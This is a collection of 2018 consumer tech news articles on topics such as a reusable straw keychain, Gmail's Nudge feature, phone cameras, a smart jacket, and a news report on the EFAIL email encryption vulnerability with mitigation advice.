Disposable plastic straws are a huge polluter. This keychain could change that
Every single day, Americans throw away an estimated 500 million single-use plastic straws, many of which wind up in landfills or the ocean without being recycled. A new handy portable implement aims to do something about that — and in a way that’s as stylish as it is eco-friendly. Called FinalStraw, it’s a keychain that transforms into a washable, reusable stainless steel straw.
“In 2013, I was in Thailand and noticed that the beach was covered in straws,” co-creator Emma Cohen told Digital Trends. “I’d pick them up every morning, and by the next morning there would be a fresh batch discarded by people who’d order drinks and carelessly discarded the straws on the pristine beach. Once you’re aware of how much of the trash in the world is made up of single-use straws, you start to notice them everywhere you look. My obsession led me to do a TEDx talk on plastic straws in 2015. Then in October 2017, I was introduced to Miles Pepper, who had a brilliant idea for a travel-friendly reusable straw. I was still working in the pollution prevention division of Los Alamos National Laboratories, in New Mexico, but I was ready for a change. I left my job and started working with Miles on the project full time.”
The project has now arrived on Kickstarter, offering customers the opportunity to get their hands (and, presumably, mouth) on the steel straw.
“FinalStraw is great for anyone who wants to reduce their plastic waste and still suck,” Pepper told us. “Lots of people have reusable water bottles, but up until now, reusable straws were too big and bulky to carry around all of the time. FinalStraw solves these problems. [Plus], whipping this sucker out is a pretty cool party trick!”
As ever, we offer warnings about the risks of pledging money as part of crowdfunding campaigns. However, if you still wish to go ahead, you can head over to FinalStraw’s Kickstarter page for more information. There are just a few days to get involved, though, so you’ll have to be quick. Prices start at $20, with an estimated shipping date set for November 2018. Despite asking for a relatively meager $12,500, the project is currently sitting at around the $1.5 million mark. Converted into orders, that may be a bit shy of the daily 500 million plastic straws mark, but it’s not a bad start.
Editors’ Recommendations
- Steve Jobs’ pre-Apple job application sold for nearly $175,000 at auction
- Can Google’s Pixel 2 ace conventional cameras? We spent a week finding out
- China nabs world record for biggest drone display, but it’s a bit of a mess
- ‘God of War’ Odin’s ravens collectibles guide
- Mercedes’ new subscription service lets you drive a luxury car without buying
Need a nudge? Gmail’s new email reminder system goes live
If you’re a Gmail user, Google is taking away your excuse of “forgetting” to respond to important emails. Alongside the redesigned Gmail webmail interface that was announced a few weeks ago, Google is now rolling out a new feature called Nudge, which makes use of artificial intelligence to remind you to respond to emails.
“When your inbox is flooded with emails, some will inevitably slip through the cracks,” Google said of the new feature in a blog post. “Luckily, the new Gmail can help. It will now ‘nudge’ users to reply to emails they may have missed and to follow up on emails for which they haven’t received a response.”
What is Nudge, and how does it work?
Nudge identifies important emails in your inbox and tells you the number of days ago it was sent and asks if you want to reply, helping you stay productive. For the feature to work, Google uses an artificial intelligence engine to scan your emails. In the past, Google scanned your emails to serve up more personalized ads, but that practice ended last June.
Google still scans your emails today, but it does so for other purposes. By using A.I., Google is able to offer features like Smart Reply, Nudge, and high-priority notifications.
Another way that Google is using A.I. to scan your inbox is to stop spams and scam emails. So while you’re able to turn off features like Nudge and Smart Reply, you cannot disable the scanning entirely because Google uses these scans for security to prevent scam emails from reaching you.
How to get ‘nudged’ on important emails
By default, Nudge is enabled for all Gmail and G Suite users. Google isn’t enabling the feature for all users at the same time, so it may take a few days for Nudge to show up in your Gmail. A requirement, however, is that you must have the new Gmail interface enabled. If you haven’t already done this, you can follow our guide on how to get the new Gmail right now.
Image: Google
Here’s how to spot a nudge
Nudges appear alongside your email previews on the right-hand side. You’ll see the sender’s name, the subject, and a preview of your email in black text. On the right of the preview on select emails is the nudge, which is shown in orange text to help draw your attention. Nudges will appear at the top of your inbox, so you’ll see them them first.
The nudge shows when the email was received and asks if you want to respond to it right now. In one example, Gmail shows that a nudge was received three days ago. By displaying when the email was received, you can focus on emails that you’ve put off longer first.
Nudges won’t appear for all emails in your inbox — it would defeat the purpose otherwise. Thanks to Google’s use of A.I. scans, Gmail will only nudge you on emails that its artificial intelligence algorithms deem are important. As the A.I. learns, hopefully Gmail will get better at nudging you based on what’s truly important.
Nudges are flagged in two different ways. First, Google will nudge you based on emails that you may have forgotten to reply to. This, hopefully, should keep the communication flowing. Second, nudge can also be used to suggest emails to follow up.
An alternative to annoying nudges
Even though nudging is enabled by default, you can disable the feature by going into your Gmail settings. Turning off Nudge won’t turn off Google’s A.I. scan of your inbox, but you won’t see the orange text asking you to respond to emails that Google thinks are important.
Image: Google
After you’ve logged in, go to the Settings cog on the top right side, and click Settings. You’ll be able to enable or disable nudges by toggling the Suggest emails to reply to box or the Suggest emails to follow up on box.
If you prefer to manage your own nudges, you can also utilize Gmail’s Snooze feature.
Hover over your email preview within Gmail. You’ll see additional options to the right of the email preview.
On the right, you’ll see a clock, which is the Snooze feature. Click on the Clock to see a drop-down with options.
You can have Google remind you to go back to this email based on presets, like later today, tomorrow, later this week, this weekend, next week, or someday. Alternatively, you can also click on Pick date and time to enter your own custom time for reminder.
Editors’ Recommendations
- Massive Gmail redesign rollout starts today for home and business
- Here’s how to get the new Gmail right this second
- Google will soon be able to write your emails for you
- Google adds snooze button, Google Pay to Gmail for iOS
- Gmail’s new confidential mode is finally rolling out. Here’s how to use it
Join Android Central on Twitter this Wednesday for a OnePlus 6 AMA!
I would do anything for AMA, but I won’t do that.

AMA. It’s the kind of cultural phenomenon that could have only come from Reddit, but the term is now part of popular culture, and that’s fine. Heck, we’re happy about it.
See, for the launch of the OnePlus 6 this Wednesday, May 16 at 10AM PT / 1PM ET / 5PM BST, we’re doing something a bit different. We’re going to do a live Twitter AMA (it stands for Ask Me Anything, if you didn’t already know) after the announcement, answering all of your questions about the new phone.
We’ll have our video editor, Alex Dobie, on-site in London for the event, and I (that’s Managing Editor, Daniel Bader) will be remote alongside MrMobile himself, Michael Fisher, to answer any and all questions you might have. (We’re not going to say we’ve seen the phone, but we may have a bit of info that you don’t 😉.)
How do you get involved? Send your questions to the @androidcentral Twitter account with the hashtag #ACOnePlus6AMA. You have to use the hashtag (and tweet @androidcentral) otherwise won’t see it. Here’s a sample question:
Hey @androidcentral, what does it feel like to #neversettle? #ACOnePlus6AMA
We’ll be doing some cool stuff during the AMA, with some specific shout-outs and perhaps a giveaway or two! The AMA kicks off as soon as the announcement ends, so between 1:30PM and 2PM ET. Submit your questions early so we’ll have a chance to respond!
Are you going to join us?
OnePlus 6
- OnePlus 6: News, Rumors, Release Date, Specs, and more!
- OnePlus 5T review: Come for the value, not the excitement
- OnePlus 6 has 19:9 notched display, Snapdragon 845, top benchmarks
- Join the discussion in the forums
iPhone X Camera Compared to LG G7 ThinQ Camera
LG recently released its latest flagship smartphone, the LG G7 ThinQ, which, like flagship smartphones from many other manufacturers, includes a high-quality dual-lens camera that enables impressive photographic capabilities.
In our latest YouTube video, we pitted the G7’s camera against the camera of the iPhone X to compare and contrast the feature set and image quality of the two devices.
Subscribe to the MacRumors YouTube channel for more videos.
While the iPhone X has a dual-lens setup that includes a wide-angle and a telephoto lens, the G7, like the G6, takes a different approach for its camera setup, introducing both a standard ~71-degree f/1.6 wide-angle lens and an even wider f/1.9 107-degree lens, eschewing telephoto capabilities all together.
Both sensors offer an improved 16-megapixel pixel count, and the standard lens includes support for optical image stabilization and an autofocus system that includes phase detection and laser.
Apple’s iPhone X has a standard 12-megapixel f/1.8 wide-angle lens paired with a 12-megapixel f/2.4 telephoto lens, which is what Apple uses for its Portrait Mode depth effects. Both wide-angle and telephoto lenses have their purposes, and with LG’s setup, you can take wider landscape shots that fit more of the background in rather than closer portrait images designed to focus on a single subject.
LG’s device also includes a portrait mode-style effect, but the background blurring is done entirely via software rather than through lens technology. LG has included a unique “AI Cam” feature that’s designed to analyze the subjects in the photo and offer up recommendations on how to make adjustments for the best possible photo.
The native camera app on the LG G7 has an option for manual operation and several included photographic modes, while taking manual shots on the iPhone X requires you to download a third-party app.
We’ve got some comparison shots of the two cameras below, along with an Imgur album with all of the images featured in the video at a higher resolution:




The LG G7 and the iPhone X are both capable devices that take high-quality photos, so you won’t go wrong with either one of these smartphones.
We largely preferred the look of the iPhone X photos because of its tendency to capture more natural colors and accurately capture images with a lot of variation in lighting without overexposing elements of the photo, but in a lot of cases, the camera you like best is going to come down to personal taste.
What do you think of the LG G7’s camera? Let us know in the comments.
Related Roundup: iPhone XTag: LGBuyer’s Guide: iPhone X (Neutral)
Discuss this article in our forums
Grasshopper lets you learn beginner code thru gaming (review)
Coding seems to be all the rage nowadays. Seemingly limitless articles explain why coding is becoming the new have-to skill, and how not know at least a little code is going to severely limit your future job prospects.
But where to start? There are so many computer languages to learn, and so many ways to go about learning them.
Believe it or not (more than likely believe it), Google wants to help you get a taste of coding, but in a more “non-coding” environment. Instead of a blank command line staring at you, goading you into creating a bug-filled script, Google wants to provide your first taste of coding in the form of- wait for it…..a mobile game.
So they’ve brought us Grasshopper, an Android game who’s sole intent is to teach you basic coding, in the format of a multi-level Android game.

So many levels to master.

Try your hand at coding!
Grasshopper has been in beta for a while, and just recently released by Google into the Play Store. Grasshopper helps you learn the basics of Javascript, a primary language used by websites all over the world.
A product of Google’s “Area 120”, where employees are encouraged to devote 20% of time to side projects they deem valuable and potential products, Grasshopper takes you on a puzzle-style game adventure, routing you through very beginner-level introduction to terms and layout, progressing deeper into more & more challenging topics and coding scenarios.
Gameplay
To enjoy Grasshopper, first download the app from the Play Store. Once in the app, you can go through an ultra-short mini-course titled, “What is Code?”. Then you dive straight into learning Javascript, through a sequential series of coding puzzles to tackle. The puzzles are broken into units.
Google spends the first couple of puzzles in each unit teaching you a principle or tactic within Javascript, with an easier puzzle to solve. Then you are given one or two additional puzzles to solve on your own.
If you ever get stuck, the game gives you quick access to a forum. Here you can investigate others’ troubles and solutions to the puzzle at hand.

Increasing difficulty….

Finishing a puzzle.

Completed unit!
When you complete the unit’s series of coding puzzles, you then have one or two quiz-level puzzles to tackle. Once you show your ability by solving these, you take your newfound expertise to the next unit. From here you build on it with the next topic or principle.
Visuals & Sound
The look and sound of Grasshopper, while a unique palette of earthy blues & greens, still has a Google-esque feel to it. The type and backgrounds are very clean & clear, and the limited animations are cute almost to the point of goofy.
Sound/audio is minimal to non-existent. But I actually liked this, being coding is a pretty solitary & quiet endeavor. Also, the silence (I believe) helps with concentration and thinking during a particularly challenging puzzle.
What We Didn’t Like
If there is a gripe with Grasshopper, it’s that using it on a phone leaves the visible code a bit hard to follow. On a computer, the code is strung out in long strings, like intended. Reading left-to-right is a pretty natural affair.
On phones or similar small-screen Android device, it’s a different story. A locked rotation in portrait orientation breaks some code into multiple lines. Specific arrays and other character combinations are broken up amongst two or more horizontal lines. The resulting orphan brackets, parentheses, and alphanumeric strings can make comprehension of certain code particularly challenging. If a landscape orientation was available, it would alleviate a lot of this frustration.
Overall
Grasshopper is generally a very, very good introduction for total beginners of all ages into the world of coding and Javascript. Google has done a great job at making exploring coding very approachable. The visuals are easy on the eyes, and plenty of chances and ways to master any given topic. If you have an itch to try out coding, or if your kiddo would like to try it out, Grasshopper is a highly-recommended option.
Download Grasshopper from the Play Store here.
Doom Creator John Carmack Shares His Interactions With Steve Jobs
John Carmack, best known for his work on iconic games that include Quake, Doom, and Wolfenstein 3D, today took to Facebook to share details on his interactions with Steve Jobs and to provide some insight into Jobs’ opinion on gaming, what it was like working with Jobs, and what it felt like to participate in one of Jobs’ famous keynotes.
Carmack first interacted with Jobs when Jobs was still at NeXT, because Carmack wanted to add a “Developed on NeXT computers” logo to the original Doom game. His request was initially denied, but later Jobs changed his mind. Doom never included a made on NeXT label, but Carmack did go on to work with Jobs on other projects.
Jobs, said Carmack, didn’t appear to “think very highly of games” and seemed to wish “they weren’t as important to his platforms as they turned out to be.” Carmack was asked to discuss gaming requirements with Apple, and ended up having “a lot of arguments” with Jobs over the adoption of OpenGL. Jobs was good at talking with “complete confidence” about things he was “just plain wrong about.”
Part of his method, at least with me, was to deride contemporary options and dare me to tell him differently. They might be pragmatic, but couldn’t actually be good.
“I have Pixar. We will make something [an API] that is actually good.” It was often frustrating, because he could talk, with complete confidence, about things he was just plain wrong about, like the price of memory for video cards and the amount of system bandwidth exploitable by the AltiVec extensions.
Carmack did convince Apple to adopt OpenGL, something Carmack says was “one of the biggest indirect impacts” on the PC industry that he’s had, and he ended up doing several keynotes with Jobs. According to Carmack, keynotes were always a “crazy fire drill with not enough time to do things right.”
At one point, Jobs asked Carmack to do a keynote that was scheduled on the day of his wedding, with Jobs going as far as asking Carmack to reschedule the event, which Carmack declined to do.
Carmack and Jobs’ relationship began to fall apart after the launch of the iPhone, over a disagreement about web apps. Carmack was advocating for native apps while Jobs preferred web apps, leading to a heated dispute that later escalated when Carmack’s comments were covered by the media.
People were backing away from us. If Steve was mad, Apple employees didn’t want him to associate the sight of them with the experience. Afterwards, one of the execs assured me that “Steve appreciates vigorous conversation”.
Still deeply disappointed about it, I made some comments that got picked up by the press. Steve didn’t appreciate that. The Steve Jobs “hero / sh**head” rollercoaster was real, and after riding high for a long time, I was now on the down side. Someone told me that Steve explicitly instructed them to not give me access to the early iPhone SDK when it finally was ready.
Carmack developed several now-defunct iOS games, the last of which was Rage for iOS, and while he had “allies” within Apple, he was “on the outs with Steve” and never again conversed with the Apple CEO.
Carmack’s full account of working with Steve Jobs, which can be found over on Facebook, is well worth reading for anyone interested in the history of Apple.
Tag: Steve Jobs
Discuss this article in our forums
Curious what you’re missing when you blink? This new wearable records it
University of the Arts Bremen
A blink might only last around 0.3 to 0.4 seconds, but that’s still enough time for you to miss information, hence the phrase “blink and you’ll miss it.” Researchers from Germany’s University of the Arts Bremen have come up with a device to help solve that problem — and it’s either the best or weirdest wearable we’ve heard about in ages. (Probably a bit of both, to be honest!)
Called “Augenblick” (German for “blink of an eye”), the wearable device records every frame of footage that’s missed when a person momentarily closes his or her eyes. To do this, it measures muscle activity around the eye by way of an electromyography sensor attached to the temple. This is used to detect miniscule electrical changes under the skin and translate that into a detectable signal. Meanwhile, a camera records the point of view of the wearer. By combining both of these information sources, it’s possible to process a video stream of all the moments missed by the wearer.
“What enabled us to create a device like Augenblick in the first place was the rapid advancement in development boards like the Arduino and Raspberry Pi,” René Henrich, one of the project creators, told Digital Trends. “These devices have gotten smaller to the point that they are suitable for the development of wearable technology. This creates opportunities to build devices that were incredibly hard or even impossible for the average person to develop before.”
University of the Arts Bremen
Manasse Pinsuwan, Henrich’s collaborator, explained that the project is intended more as a proof of concept than a finished product.
“The idea of Augenblick is to explore a new form of visual processing,” Pinsuwan said. “We see a lot of potential for further technical and conceptual applications. We are eager to try new sensors and cameras to improve the current version and broaden the approach of unconscious recording measures to other potential triggers such as yawning, laughing, or your own heartbeat. To us, Augenblick also poses highly philosophical questions about the understanding of one’s own reality and a kid’s curiosity [concerning] whether the light in the fridge would still be on once the door is closed.”
Pinsuwan noted that Augenblick still has a long way to go in order to be feasible for the average consumer. Size, ease of use, and reliability are all factors that need to be improved. Still, once that’s sorted, we may be able to finally start to claw back those several years of our lives (based on an average of five blinks a minute for 18 hours a day) we waste over the course of an average life span.
Editors’ Recommendations
- Blink to click? Nanotube-coated tissue paper sensor can track eyeball movement
- Tooth-mounted sensors track your diet and health from inside your mouth
- Harvard researchers are making robot exosuits that better support their users
- A new bracelet can detect if you’re being attacked, automatically call help
- How NextVR and the NBA are bringing VR from the sidelines to center court
How to change Google Assistant’s voice on your Android or Apple phone
If you’re using Google’s new routines, then the Google Assistant might be one of the most common voices in your day-to-day life. You wouldn’t be alone in that — with support for more than 5,000 smart devices, and the most intelligence of any smart assistant, Google is working hard to make Google Assistant a natural part of everyone’s life. But hearing the same voice every day can get tiring. Your Google Assistant’s uses are personalized to your specific tastes, so why can’t your Assistant sound different from everyone else’s?
Well, while a truly personal Google Assistant voice might be a little far-fetched, even in this age of rapidly advancing tech, you do have options when it comes to your Google Assistant’s voice. At Google I/O, it was unveiled that six new voices were coming to Google Assistant, bringing the total number of voice options to eight.
These voices were made possible with new tech that uses raw audio files to simulate voices, rather than recorded snippets of human conversations — this means a more natural speech pattern, and less of those stuttered and unnatural voices you might be used to with other virtual assistants. The option to change the Google Assistant’s voice is currently only available in the U.S., but keep an eye out for this changing in the future, as Google does like to update Assistant quite often.
So how can you pick one of these new voices for your Google Assistant on your Google Home, iOS, or Android device? Check out our easy guide.
Changing Assistant’s voice on Android devices
Since Google Assistant is baked into most Android phones, changing the Assistant’s voice is pretty simple.
To get started, activate your Google Assistant by holding the home button on your phone, or by saying “Okay Google.” When your Assistant overlay pops up, tap the blue icon in the top-right corner of the overlay to access your main Assistant feed. Then hit the three dots in the top-right corner, and select Settings > Preferences > Assistant voice.
All you need to do from there is select which of the voices you like, and tap to change it. Changing is quick and easy, so there’s no need to worry if you need to change it back again. Even-numbered voices are male, and odd-numbered voices are female.
Changing Assistant’s voice on iOS devices
Changing the Google Assistant’s voice is just as easy on iOS devices, despite it not being the go-to voice assistant for many iPhone and iPad users.
Getting started is much the same as on an Android device. Open up your Google Assistant by opening the Assistant app from your home screen. Then hit the blue icon in the top-right of the screen, followed by the three dots button on the top right, then tap Settings > Preferences > Assistant voice. Then browse your selection of voices and choose the one that suits you best.
Changing Assistant’s voice on Google Home/smart speakers
When you change the voice on your phone app, your Google Home speaker will automatically start using it. It will even swap the voice for each account connected to the speaker.
Editors’ Recommendations
- Updates to Google Assistant could make it the most natural digital helper yet
- Google Home Mini review
- Setting up Voice Match on your Google Home? Here’s a step-by-step guide
- You can now set Amazon Alexa as the default home assistant on your Android
- Want a free Google Home Mini? All you have to do is buy an LG appliance
Look ma, no wires! Google and Levi’s smart jean jacket is finally here
Why have a wearable on your wrist when you can have it all over your torso? Two years after first teasing us with their line of connected clothing, Google and Levi’s have delivered. The first piece to come out of Project Jacquard is the Commuter Trucker jacket, and you’ll have to pay $350 for the garment.
The key to the Commuter is the fabric of the jacket’s left sleeve. While technically powered by a rechargeable tag that’s found on the inside of the sleeve, the very material of the jacket is itself smart. Its comprised of a conductive yarn that could theoretically be woven into any fabric, and as a result, any sort of clothing. From there, you could just touch your clothing as you would a touchscreen in order to activate certain functionalities, like playing music.
At launch, Google said it was still working to figure out how third-party developers can contribute to the platform, and as such, it really only controlled the core functionality of your smartphone. Now, however, that seems to be changing — it has been announced that you’ll be able to connect either Lyft or Uber to the platform, so you can quickly and easily order a ride. After requesting a ride, the snap tag will light up and vibrate to notify you that your ride has arrived. Bose has also stepped in to offer some functionality in the jacket — users will be able to assign any gesture to turn on or off noise canceling on their QuietComfort 30 or QuietComfort 35 headphones.
“It was a long road but what’s really impressive, is the entire journey, we stayed true to our vision and what we wanted to achieve,” Ivan Poupyrev, project lead for Project Jacquard at Google, told Mashable. “This jacket is going to be sold as a piece of apparel, that was always the vision from the very beginning.”
Not only is it a good piece of clothing, but it also solves what Levi’s believes to be a significant need — a wearable that is functional and not dangerous.
“When you go to dinner and see your people at their meals looking at their screen, or when you see cyclists accessing their screens for navigation and putting themselves at risk … to me, that really was the reason to do it, ” said Paul Dillinger, Levi’s global product innovation head, at a SXSW discussion on connectivity.
We tested the jacket out for ourself, and found it to be pretty helpful. Not only is it stylish, but it also adds a whole new layer of digital functionality — like the smartwatch did before it.
Updated on May 14, 2018: Uber, Lyft, and Bose functionality has been added to the Project Jacquard jacket.
Editors’ Recommendations
- Facebook faces a pivotal week as Zuckerberg heads for The Hill
- I wore Levi’s smart jacket for three months, and it changed how I use my phone
- The only guide you need to get started with Google’s Wear OS
- Awesome Tech You Can’t Buy Yet: Glamping hammocks, plasma lighters, and more
- Brave any downpour in one of the best rain jackets
Email encryption flaw gives hackers full access to your secret messages
Researchers at the Munster University of Applied Sciences discovered vulnerabilities in the Pretty Good Protection (PGP) and S/MIME technologies used to encrypt email. The problem resides in how email clients use these plug-ins to decrypt HTML-based emails. Individuals and companies are encouraged to disable PGP and/or S/MIME in their email clients for now and use a separate application for message encryption.
Called EFAIL, the vulnerability abuses “active” content rendered within HTML-based emails, such as images, page styles, and other non-text content stored on a remote server. To successfully carry out an attack, the hacker must first have the encrypted email in possession, whether it’s through eavesdropping, hacking into an email server, and so on.
The first attack method is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. An attacker creates an HTML-based email comprising of three parts: the start of an image request tag, the “stolen” PGP or S/MIME ciphertext, and the end of an image request tag. The attacker then sends this revised email to the victim.
On the victim’s end, the email client first decrypts the second part and then combines all three into one email. It then converts everything into an URL form starting with the hacker’s address and sends a request to that URL to retrieve the nonexistent image. The hacker receives the image request, which contains the entire decrypted message.
The second method is called the “CBC/CFB Gadget Attack,” which resides within the PGP and S/MIME specifications, affecting all email clients. In this case, the attacker locates the first block of encrypted plaintext in the stolen email and adds a fake block filled with zeroes. The attacker then injects image tags into the encrypted plaintext, creating a single encrypted body part. When the victim’s client opens the message, the plaintext is exposed to the hacker.
Ultimately, if you don’t use PGP or S/MIME for email encryption, then there’s nothing to worry about. But individuals, companies, and corporations who use these technologies on a daily basis are advised to disable related plugins and use a third-party client to encrypt emails, such as Signal (iOS, Android). And because EFAIL relies on HTML-based emails, disabling HTML rendering is also advised for now.
“This vulnerability might be used to decrypt the contents of encrypted emails sent in the past. Having used PGP since 1993, this sounds baaad (sic),” F-Secure’s Mikko Hypponen wrote in a tweet. He later said that people use encryption for a reason: Business secrets, confidential information, and more.
According to the researchers, “some” email client developers are already working on patches that either eliminates EFAIL altogether or makes the exploits harder to accomplish. They say the PGP and S/MIME standards need an update, but that “will take some time.” The full technical paper can be read here.
The problem was first leaked by the Süddeutschen Zeitun newspaper prior to the scheduled news embargo. After the EFF contacted the researchers to confirm the vulnerabilities, the researchers were forced to release the technical paper prematurely.
Editors’ Recommendations
- How to send a text message from a computer
- Hackers target Windows clipboard to steal cryptocurrency wallet addresses
- Hackers seize Atlanta’s network system, demand $51,000 in Bitcoin as ransom
- Gmail will be AMP’d up using a speedy new tech that makes emails pretty
- How to create disposable email addresses



